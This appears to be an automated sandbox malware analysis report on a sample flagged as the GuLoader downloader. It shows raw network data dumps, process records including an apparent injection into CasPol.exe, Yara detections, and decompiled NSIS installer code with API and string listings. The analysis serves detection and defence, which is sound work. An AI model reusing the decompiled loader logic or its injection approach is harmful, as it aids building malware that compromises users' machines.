2022-11-03 06:22:07 UTC	203	IN	Data Raw: 64 dd a8 2d ca 40 ce 65 55 b8 a5 76 14 33 a7 e4 74 5a 64 d0 99 b8 d7 63 c6 c7 bc 02 8f a1 96 a5 55 6a 10 e1 40 70 95 96 30 c6 78 7a d4 83 55 e2 a6 dc 71 63 b6 30 23 90 35 7d d0 de e4 ab 15 e7 37 54 17 c7 7d 6a 28 34 75 c6 1e f6 a9 82 0e 08 d8 e4 fd 12 37 99 64 84 47 b3 81 cd 74 59 e3 97 f3 db 32 00 50 6d b3 2b 4a ea 9d 30 8e 09 29 cc ff 47 81 e0 81 c7 af 95 70 bf d8 af d0 dc 32 3f e6 3d fe 2c 22 71 83 01 4b 27 41 36 56 e0 d2 9b 45 7e fd c4 f5 6d 69 b8 b1 37 8c c2 f1 d9 90 fd 8e 1e 53 01 b0 98 80 41 8d 87 0c f6 70 9c 68 69 47 99 d4 e4 6d a3 5a 11 d3 be f1 33 67 03 ae de 57 a3 31 1f ef 1e 41 33 87 d0 d6 e3 d3 6a 92 a5 fb 34 2a 16 bf 5a a6 55 5e bb df 8d 0c 6f 86 69 b0 3b 3e 59 90 66 d3 2e e6 88 5c 44 82 bc 55 ef a3 52 42 64 ec dd 69 df 7c 83 96 36 13 d4 c1 Data Ascii: d-@eUv3tZdcUj@p0xzUqc0#5}7T}j(4u7dGtY2Pm+J0)Gp2?=,"qK'A6VE~mi7SAphiGmZ3gW1A3j4*ZU^oi;>Yf.\DURBdi\|6
2022-11-03 06:22:07 UTC	204	IN	Data Raw: 2d 42 46 91 d9 3e 4a b8 fc 86 f3 c9 c9 de ae 90 41 fa 63 b2 9b 99 68 82 96 be cb 6a 92 a0 ae d7 df 37 f3 8b 2b c6 73 6e 6d 83 b9 1b 9a be 9d c4 85 4c 4f 4e 47 cb 48 45 ba 71 36 f7 07 6a 14 0d 4e 7c a8 42 98 1f a1 a9 49 57 5a fb 9d e2 1e 65 63 7d 47 96 63 a7 ea 3e e4 72 4c cb 6f 1e 36 ad f2 1a 9c 6d 96 6b 0f 05 cf 43 d4 6f 3f 77 46 a7 15 71 cb 09 e1 87 7e af 3c 89 19 05 8e 6f 24 01 79 32 85 9f f5 2d b4 77 5d ed 73 aa 64 06 07 85 57 7c c2 df 5c 3b 2c 7f 4c df bb c5 e4 2f b4 e4 1c b2 9f a0 70 69 1d b1 57 a2 6f 5f a1 10 79 93 55 5a 9e 8b 57 8d 71 b9 ea b2 d1 41 70 59 bf ab 77 26 74 71 f1 3b ca c2 b6 d9 a9 d9 21 0d 34 9a fe 6d a0 e3 e2 10 2c f3 1d a6 49 97 7b 94 d3 28 22 50 d9 c0 54 5d ee de d8 3b 56 16 be 2e 13 17 1a 2b 96 bd cc 08 e2 0a 11 68 a6 b3 ce 24 7c Data Ascii: -BF>JAchj7+snmLONGHEq6jN\|BIWZec}Gc>rLo6mkCo?wFq~<o$y2-w]sdW\|\;,L/piWo_yUZWqApYw&tq;!4m,I{("PT];V.+h$\|
2022-11-03 06:22:07 UTC	206	IN	Data Raw: df 82 6d f2 00 a8 f5 63 94 7f 93 4e 9c 25 87 74 80 08 33 c3 2f 60 ef bc 00 ed 27 01 75 7f 7f 07 9d e2 26 e2 cf da af 10 17 a3 b3 a0 fc 41 7d ec a4 f3 86 a0 03 91 f5 ab a5 50 36 49 47 62 ba 59 e2 34 28 ce 01 ba 13 45 d3 0c 3a 98 e0 9a 82 e8 c4 f9 d4 1a ab 23 67 35 b7 d1 3b 67 6c b7 e5 31 71 f6 7a 3b 9f a0 d6 8c b6 0b cb ee 85 2a 7e a6 01 b9 ac be 04 1c 58 90 b2 74 d0 9a ea f5 7a aa 7b f0 f5 a9 55 fc 62 2b 58 6a 63 fa 36 aa 5c 63 bd 69 52 c6 09 2f 1d 07 a5 cc 81 ee 09 67 0a 99 a4 6d 08 7c 74 be b5 c2 7f 03 9b 0f e3 35 90 dc df 19 2e 46 9e 50 ae eb 33 25 03 9e ce 97 ca 84 bc e7 e2 f0 ae 0d 4e fb b5 fe 92 8d 8a e5 da 39 f0 19 66 64 32 2e 5d f2 4a 87 74 87 e0 9c 64 79 4a 32 1d 94 df af d9 8a f0 39 7d 69 01 ef c5 2d 54 08 ce aa 6c fc fd 47 ab 25 71 6c f2 fa 61 Data Ascii: mcN%t3/`'u&A}P6IGbY4(E:#g5;gl1qz;*~Xtz{Ub+Xjc6\ciR/gm\|t5.FP3%N9fd2.]JtdyJ29}i-TlG%qla
2022-11-03 06:22:07 UTC	207	IN	Data Raw: c0 43 73 02 20 e0 c4 06 2a c6 e9 8a 66 bf cf b2 51 b2 5f 5b 19 82 a5 d5 ef e0 14 6b d2 fe 71 be d7 f1 eb dc db 2e af 62 2d 14 64 29 57 9a a5 0c 9c 3c f0 a1 ee 44 8f ca 8c f3 7c 9d de 67 6f 4d 57 bb 23 a7 0c f6 05 63 c6 39 5f 27 52 c9 21 26 1a 03 04 9a 52 8a 58 80 a1 f9 f4 e8 fc e9 b1 e7 96 f5 c1 f5 33 f3 2d 54 f7 08 14 53 a8 9b e4 41 69 72 21 e9 0f 60 c3 c0 16 60 3f f9 ea 03 45 1a 1e 3a 65 26 ae 1a 1c a3 56 18 84 ec 76 a8 9c d9 8d c9 9d 8f c7 29 fd 90 db 9b e8 8e c0 1f 90 51 b9 a9 d1 98 ef 0d d7 6b 58 26 bb 17 a4 5f 9f 00 e9 ca e1 f5 a3 c0 87 1f 47 da d5 af 25 05 d7 2b 68 ab 59 5c d0 bd 9c 63 1c a5 24 a7 ad f7 8b bb 68 35 f8 0e f7 ed c5 21 c3 bd ce bb 30 52 07 b3 d5 32 be 8b 2c bc 16 e6 19 79 eb 19 19 da 3f 16 b4 1c c8 4c 0d de db b3 ec c2 dd 45 f1 91 7a Data Ascii: Cs *fQ_[kq.b-d)W<D\|goMW#c9_'R!&RX3-TSAir!``?E:e&Vv)QkX&_G%+hY\c$h5!0R2,y?LEz

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exePID: 6320, Parent PID: 5040

General

Target ID:	1
Start time:	07:21:23
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Imagebase:	0x400000
File size:	531480 bytes
MD5 hash:	5F570885A22CF0A74CA454EA710BCD2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 2752, Parent PID: 6320

General

Target ID:	10
Start time:	07:21:43
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Imagebase:	0xcb0000
File size:	106496 bytes
MD5 hash:	7BAE06CBE364BB42B8C34FCFB90E3EBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.29011621997.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7924, Parent PID: 2752

General

Target ID:	11
Start time:	07:21:44
Start date:	03/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61a470000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exePID: 6320, Parent PID: 5040COMMON

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	24.2%
Signature Coverage:	29.1%
Total number of Nodes:	1390
Total number of Limit Nodes:	103

Executed Functions

Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x434eec = _t51;
				if(_t51 != 6) {
					_t149 = E0040665C(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x434fb8 = _t56;
				SHGetFileInfoW(0x42b208, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E00406282(0x433ee0, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe\"";
				E00406282(_t193, _t60);
				 *0x434ee0 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe\"" == 0x22) {
					_t63 =  &M0043F002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B80(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E00403342(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E004038B6();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x434f94 - _t151;
								if( *0x434f94 == _t151) {
									L72:
									_t72 =  *0x434fac;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E0040665C(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058E4( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x434f00 == _t151) {
							L47:
							 *0x434fac =  *0x434fac | 0xffffffff;
							 *(_t197 + 0x14) = E00403990( *0x434fac);
							goto L48;
						}
						_t184 = E00405B80(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E0040584F(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E00405832();
									} else {
										E004057B5();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry" - _t151; // 0x43
									if(_t243 == 0) {
										E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry", _t195);
									}
									E00406282(0x435000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x435800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x120)));
										DeleteFileW(0x42aa08);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", 0x42aa08, 1) != 0) {
											E00406048(_t156, 0x42aa08, _t151);
											E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x124)));
											_t103 = E00405867(0x42aa08);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x435800 =  *0x435800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406048(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C5B(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry", _t185);
							E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E00403342(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E00403342(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x434fa0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B80(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065EC(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E0040665C(0xa);
					 *0x434ee4 = E0040665C(8);
					_t56 = E0040665C(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x434eef =  *0x434eef | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x0040337e
0x0040337f
0x00403386
0x0040338a
0x00403392
0x00403396
0x004033a2
0x004033ab
0x004033b0
0x004033b3
0x004033ba
0x004033c1
0x004033c1
0x004033ba
0x004033c3
0x004033c3
0x0040340b
0x0040340c
0x00403413
0x00403419
0x0040342f
0x0040343f
0x00403444
0x0040344a
0x00403451
0x00403465
0x0040346a
0x0040346c
0x00403470
0x00403475
0x00403475
0x00403484
0x00403486
0x0040348a
0x00403490
0x004035a7
0x004035ad
0x004035b8
0x004035ba
0x004035bf
0x004035c1
0x00403619
0x0040361e
0x00403628
0x0040362f
0x00403633
0x004036e4
0x004036e4
0x004036e9
0x004036ef
0x004036f4
0x0040381a
0x00403820
0x0040389e
0x0040389e
0x004038a3
0x004038a6
0x004038a8
0x004038a8
0x004038b0
0x004038b0
0x00403830
0x00403836
0x00403838
0x00403845
0x00403858
0x00403860
0x00403868
0x00403868
0x00403870
0x00403875
0x0040387c
0x0040388a
0x0040388d
0x00403893
0x00403895
0x00000000
0x00000000
0x00000000
0x0040387e
0x00403884
0x00403886
0x00403888
0x00403897
0x00403899
0x00000000
0x00403899
0x00000000
0x00403888
0x0040387c
0x00403703
0x0040370a
0x0040370a
0x0040363f
0x004036d4
0x004036d4
0x004036e0
0x00000000
0x004036e0
0x0040364c
0x00403650
0x0040369e
0x0040369e
0x004036a0
0x004036a8
0x0040371b
0x0040371d
0x00403724
0x0040372c
0x0040372c
0x00403737
0x0040373c
0x0040374b
0x0040374f
0x00403750
0x00403759
0x00403752
0x00403752
0x00403752
0x0040375f
0x00403765
0x0040376c
0x00403774
0x00403774
0x00403782
0x0040378e
0x0040379c
0x004037a1
0x004037a7
0x004037b3
0x004037b9
0x004037c3
0x004037d9
0x004037ea
0x004037f0
0x004037f7
0x004037fa
0x00403800
0x00403800
0x004037f7
0x00403804
0x0040380b
0x0040380b
0x00403810
0x00403810
0x00000000
0x0040374b
0x004036aa
0x004036ad
0x004036b8
0x00000000
0x00000000
0x004036c0
0x004036cb
0x004036d0
0x00000000
0x004036d0
0x00403659
0x00403671
0x00403682
0x00403683
0x00403687
0x00403689
0x00403697
0x0040369a
0x00000000
0x00000000
0x00000000
0x0040369a
0x0040369c
0x00000000
0x0040369c
0x004035c9
0x004035d5
0x004035da
0x004035df
0x004035e1
0x00000000
0x00000000
0x004035e9
0x004035f1
0x00403602
0x0040360a
0x0040360c
0x00403611
0x00403613
0x00000000
0x00000000
0x00000000
0x00403496
0x00403496
0x00403498
0x0040349c
0x004034a5
0x004034a9
0x004034ae
0x004034af
0x004034af
0x004034b4
0x00000000
0x004034ba
0x004034bb
0x004034c0
0x004034c2
0x004034ca
0x004034d1
0x004034d1
0x004034ca
0x004034e2
0x004034f5
0x004034f6
0x0040350b
0x00403510
0x00403514
0x0040351d
0x00403525
0x0040352c
0x0040352c
0x00403525
0x00403538
0x0040354b
0x0040354c
0x00403561
0x00403567
0x0040356b
0x00000000
0x00403592
0x00403592
0x00403597
0x004035a0
0x004035a5
0x004035a5
0x00000000
0x004035a5
0x0040356b
0x00000000
0x00000000
0x00000000
0x0040349e
0x0040349e
0x0040349f
0x004034a0
0x00000000
0x00403573
0x0040357a
0x00403580
0x00403583
0x00403583
0x00403584
0x00403587
0x00000000
0x00403590
0x004033c8
0x004033c9
0x004033d5
0x004033dc
0x00000000
0x004033de
0x004033e0
0x004033ee
0x004033f3
0x004033fa
0x004033fe
0x00403402
0x00403404
0x00403404
0x00403402
0x00000000
0x004033fa

APIs

SetErrorMode.KERNELBASE ref: 00403396
GetVersion.KERNEL32 ref: 0040339C
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
OleInitialize.OLE32(00000000), ref: 00403413
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E

Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E

Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
ExitProcess.KERNEL32 ref: 0040370A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
OpenProcessToken.ADVAPI32(00000000), ref: 00403830
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
AdjustTokenPrivileges.ADVAPI32 ref: 00403868
ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
ExitProcess.KERNEL32 ref: 004038B0

Strings

Error launching installer, xrefs: 004036A0
SeShutdownPrivilege, xrefs: 0040383F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne, xrefs: 004036C6
UXTHEME, xrefs: 004033C3, 004033C8, 004033CE
C:\Users\user\Desktop, xrefs: 0040373C, 00403741, 0040376E
\Temp, xrefs: 004035CF
1033, xrefs: 00403619
Low, xrefs: 004035EB
TMP, xrefs: 00403605
.tmp, xrefs: 00403731
~nsu, xrefs: 00403715
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry, xrefs: 0040359B, 004036BB, 00403765, 0040376F
C:\Users\user\AppData\Local\Temp\, xrefs: 004035AD, 004035B2, 004035C8, 004035D4, 004035E3, 004035F0, 004035FC, 00403604, 0040371A, 0040372B, 00403736, 00403742, 0040374F, 0040375E, 0040380F
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, xrefs: 004037C8
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 0040344A, 00403450, 00403646
TEMP, xrefs: 004035FD
NSIS Error, xrefs: 00403435

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
